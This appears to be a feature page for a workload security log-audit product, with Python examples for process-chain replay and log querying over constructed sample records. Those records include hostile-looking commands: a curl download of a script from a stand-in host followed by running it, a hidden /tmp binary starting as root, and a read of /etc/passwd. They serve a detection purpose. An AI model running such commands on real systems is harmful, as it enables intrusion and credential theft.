Records detailed Bash command input on each workload to support response to workload behavior, capturing key fields such as source IP, terminal, user, and the command details.
Records workload connection logs, filtering out meaningless web access and ultra-short connections, so that only changes in the workload's real network connections are recorded.
Provides all login records, including successes, failures, and logouts, and monitors changes to accounts and account groups: additions, deletions, modifications, and changes of passwords and permissions.
Records newly started processes on the system, including start time, user, parent process, and command line. It can also locate the starting point of any process and replay the attack process.
Obtains the web DNS resolution log and associates it with the workload. Through the relationship between domain name and workload, it provides analysis logs from the web perspective for web intrusion detection.
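The process-start log described above is what makes "find the starting point and replay" possible: each record carries its parent process, so a chain can be walked backwards to the origin and forwards through every descendant. The following is an added illustration, not the product's own code, using constructed sample records whose field names (pid, ppid, user, time, cmd) are assumptions about the log format.

```python
from typing import Dict, List, Tuple

# Constructed sample process-start records (not real logs). A session from sshd
# leads to a shell that downloads a script and runs it; the last child starts as root.
PROCESS_STARTS = [
    {"pid": 1200, "ppid": 1,    "user": "root",  "time": "2024-01-01T10:00:00", "cmd": "/usr/sbin/sshd -D"},
    {"pid": 2310, "ppid": 1200, "user": "root",  "time": "2024-01-01T10:05:12", "cmd": "sshd: alice [priv]"},
    {"pid": 2315, "ppid": 2310, "user": "alice", "time": "2024-01-01T10:05:13", "cmd": "-bash"},
    {"pid": 2400, "ppid": 2315, "user": "alice", "time": "2024-01-01T10:06:40", "cmd": "curl -s http://example.invalid/x.sh -o /tmp/x.sh"},
    {"pid": 2401, "ppid": 2315, "user": "alice", "time": "2024-01-01T10:06:41", "cmd": "bash /tmp/x.sh"},
    {"pid": 2410, "ppid": 2401, "user": "alice", "time": "2024-01-01T10:06:42", "cmd": "chmod +x /tmp/.svc"},
    {"pid": 2411, "ppid": 2401, "user": "root",  "time": "2024-01-01T10:06:43", "cmd": "/tmp/.svc"},
]


def index_by_pid(records: List[dict]) -> Dict[int, dict]:
    return {r["pid"]: r for r in records}


def ancestry(records: List[dict], pid: int) -> List[dict]:
    """Walk parent links from pid up to the root and return the chain root-first.
    This answers the 'starting point' question: where did this process come from?"""
    by_pid = index_by_pid(records)
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # seen-set guards against cyclic ppid data
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def replay(records: List[dict], root_pid: int) -> List[dict]:
    """Every process started under root_pid (transitively), in start-time order,
    i.e. the replay of what happened after that process appeared."""
    children: Dict[int, List[dict]] = {}
    for r in records:
        children.setdefault(r["ppid"], []).append(r)
    out, stack = [], [root_pid]
    while stack:
        parent = stack.pop()
        for child in children.get(parent, []):
            out.append(child)
            stack.append(child["pid"])
    return sorted(out, key=lambda r: (r["time"], r["pid"]))


def user_transitions(records: List[dict]) -> List[Tuple[int, int, str, str]]:
    """Pairs (parent_pid, child_pid, parent_user, child_user) where the child
    started under a different user than its parent."""
    by_pid = index_by_pid(records)
    out = []
    for r in records:
        parent = by_pid.get(r["ppid"])
        if parent is not None and parent["user"] != r["user"]:
            out.append((parent["pid"], r["pid"], parent["user"], r["user"]))
    return out


def escalations(records: List[dict]) -> List[Tuple[int, int, str, str]]:
    """Subset of user_transitions where an unprivileged parent spawned a root child.
    sshd dropping from root to the login user is normal; the reverse is worth review."""
    return [t for t in user_transitions(records) if t[2] != "root" and t[3] == "root"]


def render_chain(chain: List[dict]) -> str:
    """Indented, human-readable view of an ancestry chain for an analyst."""
    return "\n".join(
        "  " * depth + f'{r["time"]} [{r["user"]}] pid={r["pid"]} {r["cmd"]}'
        for depth, r in enumerate(chain)
    )


if __name__ == "__main__":
    print(render_chain(ancestry(PROCESS_STARTS, 2411)))
    print("escalations:", escalations(PROCESS_STARTS))
```

Running it prints the chain from sshd down to the root-owned binary in /tmp, and flags the one parent-to-child user change that went upward in privilege.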
Self-developed QSL grammar uses a "field name + connector + query keyword" retrieval method. It is highly extensible and flexible, can query data across logs, and helps find data features and security clues.
By default, the system provides time-distribution analysis of the data and supports drilling down into any period of time. It also supports common analysis functions such as total statistics and score statistics on any field in the log.
Based on the characteristics of different logs and combined with security experience, the system provides a variety of log query perspectives that quickly surface data characteristics and facilitate further investigation. Query scenarios can also be customized by customers to simplify follow-up queries.
The system provides a variety of security log output functions, including API, SYSLOG, and CSV file export. It integrates quickly with an enterprise's other data analysis platforms for correlation analysis or secondary development.
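To show what a "field name + connector + keyword" query and the time-distribution drill-down look like in practice, here is an added example over constructed Bash input records like those described at the top of the page. It is not the product's QSL implementation: the connectors (=, !=, ~, !~, <, >, <=, >=), the AND-joined clause syntax, the record field names and the bucket granularities are all assumptions of this illustration.

```python
import re
from collections import Counter
from typing import Dict, List, Tuple

# Constructed sample Bash input records (not real logs): time, source IP, terminal,
# user, host and the command typed.
BASH_LOGS = [
    {"time": "2024-01-01T09:58:02", "ip": "10.0.0.5", "tty": "pts/0", "user": "alice", "host": "web-01", "cmd": "ls -la /var/www"},
    {"time": "2024-01-01T10:06:40", "ip": "10.0.0.5", "tty": "pts/0", "user": "alice", "host": "web-01", "cmd": "curl -s http://example.invalid/x.sh -o /tmp/x.sh"},
    {"time": "2024-01-01T10:06:41", "ip": "10.0.0.5", "tty": "pts/0", "user": "alice", "host": "web-01", "cmd": "bash /tmp/x.sh"},
    {"time": "2024-01-01T10:31:15", "ip": "10.0.0.9", "tty": "pts/1", "user": "bob",   "host": "web-01", "cmd": "tail -f /var/log/nginx/access.log"},
    {"time": "2024-01-01T11:02:00", "ip": "10.0.0.9", "tty": "pts/1", "user": "bob",   "host": "db-01",  "cmd": "cat /etc/passwd"},
    {"time": "2024-01-01T11:02:30", "ip": "10.0.0.5", "tty": "pts/2", "user": "alice", "host": "db-01",  "cmd": "curl http://example.invalid/y"},
]

# One clause: field, connector, then either a "quoted value" or a bare token.
CLAUSE_RE = re.compile(r'^\s*(\w+)\s*(!=|!~|>=|<=|=|~|>|<)\s*(?:"([^"]*)"|(\S+))\s*$')


def parse_query(query: str) -> List[Tuple[str, str, str]]:
    """'user = alice AND cmd ~ curl' -> [('user','=','alice'), ('cmd','~','curl')]."""
    clauses = []
    for part in re.split(r"\s+AND\s+", query.strip(), flags=re.IGNORECASE):
        m = CLAUSE_RE.match(part)
        if not m:
            raise ValueError(f"bad clause: {part!r}")
        field, op, quoted, bare = m.groups()
        clauses.append((field, op, quoted if quoted is not None else bare))
    return clauses


def _clause_matches(record: dict, field: str, op: str, value: str) -> bool:
    actual = record.get(field)
    if actual is None:            # a record lacking the field never matches
        return False
    a = str(actual)
    if op == "=":  return a == value
    if op == "!=": return a != value
    if op == "~":  return value.lower() in a.lower()      # substring, case-insensitive
    if op == "!~": return value.lower() not in a.lower()
    # Ordered connectors compare as strings; ISO-8601 timestamps sort correctly this way.
    return {">": a > value, "<": a < value, ">=": a >= value, "<=": a <= value}[op]


def search(records: List[dict], query: str) -> List[dict]:
    """Records for which every AND-joined clause holds."""
    clauses = parse_query(query)
    return [r for r in records if all(_clause_matches(r, f, o, v) for f, o, v in clauses)]


# Time bucket = prefix length of an ISO-8601 timestamp.
BUCKET_WIDTH = {"day": 10, "hour": 13, "minute": 16}


def time_distribution(records: List[dict], granularity: str = "hour") -> Dict[str, int]:
    """Count of records per time bucket, e.g. {'2024-01-01T10': 3}."""
    width = BUCKET_WIDTH[granularity]
    return dict(Counter(r["time"][:width] for r in records))


def drill_down(records: List[dict], bucket: str, granularity: str) -> Dict[str, int]:
    """Re-bucket only the records inside one coarser bucket at a finer granularity."""
    return time_distribution([r for r in records if r["time"].startswith(bucket)], granularity)


def top_values(records: List[dict], field: str, n: int = 5) -> List[Tuple[str, int]]:
    """Most common values of a field and their counts (the 'total statistics' view)."""
    return Counter(str(r[field]) for r in records if field in r).most_common(n)


if __name__ == "__main__":
    hits = search(BASH_LOGS, 'user = alice AND cmd ~ curl AND time >= 2024-01-01T10')
    for r in hits:
        print(r["time"], r["ip"], r["host"], r["cmd"])
    print(time_distribution(BASH_LOGS, "hour"))
    print(drill_down(BASH_LOGS, "2024-01-01T10", "minute"))
    print(top_values(BASH_LOGS, "ip"))
```

A saved "query scenario" in this model is just a named query string reused later, for example `'cmd ~ /tmp AND user != root'`; the time buckets are string prefixes, so drilling from hour to minute is a second call over the filtered subset rather than a new index.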